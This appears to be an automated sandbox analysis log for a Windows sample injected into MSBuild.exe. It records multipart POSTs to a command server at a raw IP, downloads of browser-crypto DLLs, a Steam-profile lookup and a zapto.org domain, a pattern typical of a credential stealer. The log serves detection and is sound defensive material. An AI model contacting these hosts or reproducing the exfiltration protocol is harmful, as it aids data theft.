                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJDGCAEBFIIECAKFHIJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFCFBFBFBKFIDHJKFCAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKECFIIEHCFHIECAFBAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 6713Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDGCGIDAKEBKECAFIEHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDBAAAEHIEGCAKFHCGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAAAAAAAAAAAAAAAAAAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCFBFBFBKFIDHJKFCAFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGHCGCBKFIECBFHIDGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGHJEHJJDAAAKEBGCFCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJJEGHIIDAFIDHJDHJEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECFIJDAAAKECBFCGHIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 457Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIEGDBKJKEBGCBAFCFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 98617Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKECAAAFHJECAAAEBFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKJDGCGDAKFHIDBGCBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00405010 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,4_2_00405010
                        Source: global trafficHTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                        Source: global trafficDNS traffic detected: DNS query: arpdabl.zapto.org
                        Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJDGCAEBFIIECAKFHIJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                        Source: file.exe, 00000000.00000002.1692402449.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1691045839.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.000000000446A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadCont
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.HJECAAAEBF
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.AEBF
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.org
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.org/
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.org/A
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.org/G
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.org/I
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.org/i
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.org/q
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.org/v
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.org/y
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zapto.orgF
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://arpdabl.zaptoAAEBF
                        Source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                        Source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                        Source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                        Source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                        Source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                        Source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                        Source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0
                        Source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0A
                        Source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0C
                        Source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://ocsp.digicert.com0N
